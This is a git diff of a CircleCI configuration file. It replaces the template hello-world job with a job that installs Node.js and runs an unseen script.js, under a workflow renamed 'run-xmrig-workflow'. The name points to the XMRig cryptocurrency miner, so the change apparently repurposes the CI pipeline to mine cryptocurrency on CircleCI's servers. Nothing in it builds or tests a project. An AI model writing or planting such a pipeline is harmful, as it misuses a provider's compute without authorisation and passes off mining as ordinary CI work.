--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -1,26 +1,36 @@
-# Use the latest 2.1 version of CircleCI pipeline process engine.
-# See: https://circleci.com/docs/configuration-reference
 version: 2.1
 
-# Define a job to be invoked later in a workflow.
-# See: https://circleci.com/docs/configuration-reference/#jobs
 jobs:
-  say-hello:
-    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
-    # See: https://circleci.com/docs/configuration-reference/#executor-job
+  run-g:
     docker:
-      - image: cimg/base:stable
-    # Add steps to the job
-    # See: https://circleci.com/docs/configuration-reference/#steps
+      - image: ubuntu:latest
+
     steps:
       - checkout
-      - run:
-          name: "Say hello"
-          command: "echo Hello, World!"
 
-# Orchestrate jobs using workflows
-# See: https://circleci.com/docs/configuration-reference/#workflows
+      # Install Node.js and npm
+      - run:
+          name: Install Node.js and npm
+          command: |
+            apt-get update -y
+            apt-get install -y nodejs npm
+
+      # Display Node.js and npm versions
+      - run:
+          name: Display Node.js version
+          command: node -v
+
+      - run:
+          name: Display npm version
+          command: npm -v
+
+      # Run script.js
+      - run:
+          name: Run script.js
+          command: node script.js
+
 workflows:
-  say-hello-workflow:
+  version: 2
+  run-xmrig-workflow:
     jobs:
-      - say-hello
+      - run-g
